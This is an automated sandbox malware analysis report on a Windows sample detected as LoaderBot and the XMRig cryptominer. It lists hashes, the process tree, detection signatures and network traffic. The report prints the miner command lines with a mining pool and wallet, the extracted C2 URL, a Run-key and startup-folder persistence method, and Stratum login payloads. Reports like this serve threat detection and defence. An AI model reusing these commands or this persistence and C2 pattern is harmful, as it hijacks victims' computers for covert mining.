Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
h2UFp4aCRq.exe

Overview

General Information

Sample name:h2UFp4aCRq.exe
renamed because original name is a hash value
Original sample name:1fecbc51b5620e578c48a12ebeb19bc2.exe
Analysis ID:1461232
MD5:1fecbc51b5620e578c48a12ebeb19bc2
SHA1:94fe551f4fb3ff76a0be99a962dc20fc2656453e
SHA256:9a4c96b227213b7049f851572487d42c994220bbf584f631bf347a507b684c1a
Tags:64exetrojan
Infos:

Detection

LoaderBot, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Xmrig
Snort IDS alert for network traffic
Yara detected LoaderBot
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Machine Learning detection for dropped file
Sigma detected: Potential Crypto Mining Activity
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • h2UFp4aCRq.exe (PID: 4484 cmdline: "C:\Users\user\Desktop\h2UFp4aCRq.exe" MD5: 1FECBC51B5620E578C48A12EBEB19BC2)
    • cmd.exe (PID: 3488 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • rolex.exe (PID: 6584 cmdline: rolex.exe -priverdD MD5: 8866D677A3309A0AD903F37557C5941B)
        • yondex.exe (PID: 6936 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe" MD5: BD2413C32E34D0031F7881D51AE731FF)
          • Driver.exe (PID: 7280 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2 MD5: 02569A7A91A71133D4A1023BF32AA6F4)
            • conhost.exe (PID: 7288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WerFault.exe (PID: 7400 cmdline: C:\Windows\system32\WerFault.exe -u -p 7280 -s 764 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
          • Driver.exe (PID: 7440 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2 MD5: 02569A7A91A71133D4A1023BF32AA6F4)
            • conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WerFault.exe (PID: 7340 cmdline: C:\Windows\system32\WerFault.exe -u -p 7440 -s 552 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 7344 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 7384 cmdline: C:\Windows\system32\WerFault.exe -pss -s 436 -p 7280 -ip 7280 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 7400 cmdline: C:\Windows\system32\WerFault.exe -pss -s 208 -p 7440 -ip 7440 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 7808 cmdline: C:\Windows\system32\WerFault.exe -pss -s 548 -p 7424 -ip 7424 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 8052 cmdline: C:\Windows\system32\WerFault.exe -pss -s 508 -p 1712 -ip 1712 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • yondex.exe (PID: 7568 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe" MD5: BD2413C32E34D0031F7881D51AE731FF)
  • yondex.exe (PID: 7864 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe" MD5: BD2413C32E34D0031F7881D51AE731FF)
  • yondex.exe (PID: 8064 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe" MD5: BD2413C32E34D0031F7881D51AE731FF)
    • Driver.exe (PID: 7424 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2 MD5: 02569A7A91A71133D4A1023BF32AA6F4)
      • conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WerFault.exe (PID: 7724 cmdline: C:\Windows\system32\WerFault.exe -u -p 7424 -s 876 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • Driver.exe (PID: 1712 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2 MD5: 02569A7A91A71133D4A1023BF32AA6F4)
      • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WerFault.exe (PID: 692 cmdline: C:\Windows\system32\WerFault.exe -u -p 1712 -s 864 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • Driver.exe (PID: 3600 cmdline: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2 MD5: 02569A7A91A71133D4A1023BF32AA6F4)
      • conhost.exe (PID: 5652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: LoaderBot

{"C2 url": "https://cv99160.tw1.ru/cmd.php"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeJoeSecurity_LoaderBotYara detected LoaderBotJoe Security
      C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeMALWARE_Win_CoinMiner04Detects coinmining malwareditekSHen
      • 0x24ea:$s1: createDll
      • 0x27dc:$s2: getTasks
      • 0x2644:$s3: SetStartup
      • 0x2518:$s4: loadUrl
      • 0x26cd:$s5: Processer
      • 0x2849:$s6: checkProcess
      • 0x2856:$s7: runProcess
      • 0x26f5:$s8: createDir
      • 0x2a0b:$cnc1: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
      • 0x2a9f:$cnc2: ?hwid=
      • 0x2acf:$cnc3: ?timeout=1
      • 0x2c01:$cnc4: &completed=
      • 0x2c45:$cnc5: /cmd.php

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000001D.00000003.3496111858.0000000000515000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        0000001D.00000003.3609636273.0000000000515000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000015.00000002.3029846124.0000000000656000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000005.00000002.1804831542.00000000004A6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              0000000A.00000002.2583502346.00000000005E2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                Click to see the 19 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                4.0.yondex.exe.690000.0.unpackJoeSecurity_LoaderBotYara detected LoaderBotJoe Security
                  4.0.yondex.exe.690000.0.unpackMALWARE_Win_CoinMiner04Detects coinmining malwareditekSHen
                  • 0x24ea:$s1: createDll
                  • 0x27dc:$s2: getTasks
                  • 0x2644:$s3: SetStartup
                  • 0x2518:$s4: loadUrl
                  • 0x26cd:$s5: Processer
                  • 0x2849:$s6: checkProcess
                  • 0x2856:$s7: runProcess
                  • 0x26f5:$s8: createDir
                  • 0x2a0b:$cnc1: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                  • 0x2a9f:$cnc2: ?hwid=
                  • 0x2acf:$cnc3: ?timeout=1
                  • 0x2c01:$cnc4: &completed=
                  • 0x2c45:$cnc5: /cmd.php

                  Sigma Signatures

                  Bitcoin Miner

                  barindex
                  Sigma detected: Xmrig
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2, CommandLine: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, NewProcessName: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe, ParentProcessId: 6936, ParentProcessName: yondex.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2, ProcessId: 7280, ProcessName: Driver.exe

                  System Summary

                  barindex
                  Sigma detected: Potential Crypto Mining Activity
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2, CommandLine: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, NewProcessName: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe, ParentProcessId: 6936, ParentProcessName: yondex.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2, ProcessId: 7280, ProcessName: Driver.exe
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe, ProcessId: 6936, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 7344, ProcessName: svchost.exe

                  Data Obfuscation

                  barindex
                  Sigma detected: Drops script at startup location
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe, ProcessId: 6936, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url

                  Snort Signatures

                  Timestamp:06/23/24-11:31:12.198589
                  SID:2047928
                  Source Port:49698
                  Destination Port:53
                  Protocol:UDP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                  Found malware configuration
                  Source: 4.0.yondex.exe.690000.0.unpackMalware Configuration Extractor: LoaderBot {"C2 url": "https://cv99160.tw1.ru/cmd.php"}
                  Multi AV Scanner detection for domain / URL
                  Source: pool.supportxmr.comVirustotal: Detection: 9%Perma Link
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeVirustotal: Detection: 14%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeVirustotal: Detection: 67%Perma Link
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeReversingLabs: Detection: 60%
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeVirustotal: Detection: 68%Perma Link
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe (copy)Virustotal: Detection: 67%Perma Link
                  Multi AV Scanner detection for submitted file
                  Source: h2UFp4aCRq.exeReversingLabs: Detection: 39%
                  Source: h2UFp4aCRq.exeVirustotal: Detection: 56%Perma Link
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeJoe Sandbox ML: detected

                  Bitcoin Miner

                  barindex
                  Yara detected Xmrig cryptocurrency miner
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 0000001D.00000003.3496111858.0000000000515000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000003.3609636273.0000000000515000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.3029846124.0000000000656000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.1804831542.00000000004A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2583502346.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000003.3763661932.0000000000515000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000002.4173054764.0000000000515000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.3029846124.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.1805223166.0000000140001000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.3336155249.0000000000611000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000002.4172854345.0000000000491000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rolex.exe PID: 6584, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: yondex.exe PID: 6936, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Driver.exe PID: 7280, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Driver.exe PID: 7440, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Driver.exe PID: 7424, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Driver.exe PID: 1712, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Driver.exe PID: 3600, type: MEMORYSTR
                  Detected Stratum mining protocol
                  Source: global trafficTCP traffic: 192.168.2.4:49732 -> 141.94.96.144:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"49p3pcazuyqgzcctcw2i6kgbfc5nozalz4wrytdxqn8yrbzjnb4f2ee6f7vggfwqgqeb5qdae3oww72bsbnbcpetadgcrmw","pass":"x","agent":"xmrig/6.2.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/wrkz","astrobwt","kawpow"]}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49797 -> 141.94.96.144:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"49p3pcazuyqgzcctcw2i6kgbfc5nozalz4wrytdxqn8yrbzjnb4f2ee6f7vggfwqgqeb5qdae3oww72bsbnbcpetadgcrmw","pass":"x","agent":"xmrig/6.2.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/wrkz","astrobwt","kawpow"]}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49825 -> 141.94.96.195:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"49p3pcazuyqgzcctcw2i6kgbfc5nozalz4wrytdxqn8yrbzjnb4f2ee6f7vggfwqgqeb5qdae3oww72bsbnbcpetadgcrmw","pass":"x","agent":"xmrig/6.2.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/wrkz","astrobwt","kawpow"]}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49843 -> 141.94.96.71:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"49p3pcazuyqgzcctcw2i6kgbfc5nozalz4wrytdxqn8yrbzjnb4f2ee6f7vggfwqgqeb5qdae3oww72bsbnbcpetadgcrmw","pass":"x","agent":"xmrig/6.2.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","algo":["cn/0","cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/0","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/wrkz","astrobwt","kawpow"]}}.
                  Found strings related to Crypto-Mining
                  Source: Driver.exeString found in binary or memory: stratum+tcp://
                  Source: rolex.exe, 00000003.00000003.1726307942.000001FEAC072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: @cryptonight/0cn
                  Source: Driver.exeString found in binary or memory: stratum+tcp://
                  Source: Driver.exe, 00000005.00000002.1805223166.0000000140001000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                  Source: Driver.exe, 00000005.00000002.1805223166.0000000140001000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                  Source: Driver.exe, 00000005.00000002.1805223166.0000000140001000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: XMRig 6.2.2
                  Source: unknownHTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49737 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49749 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49755 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49834 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49837 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 92.53.96.121:443 -> 192.168.2.4:49878 version: TLS 1.2
                  Source: h2UFp4aCRq.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\danie\Desktop\Sources\Miner Source1\obj\x86\Debug\miner.pdb source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr
                  Source: Binary string: C:\Users\danie\Desktop\Sources\Miner Source1\obj\x86\Debug\miner.pdbP source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr
                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: h2UFp4aCRq.exe, rolex.exe.0.dr
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF65594B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF65594B190
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF6559340BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6559340BC
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF65595FCA0 FindFirstFileExA,0_2_00007FF65595FCA0
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4A40BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF7AB4A40BC
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4BB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noretu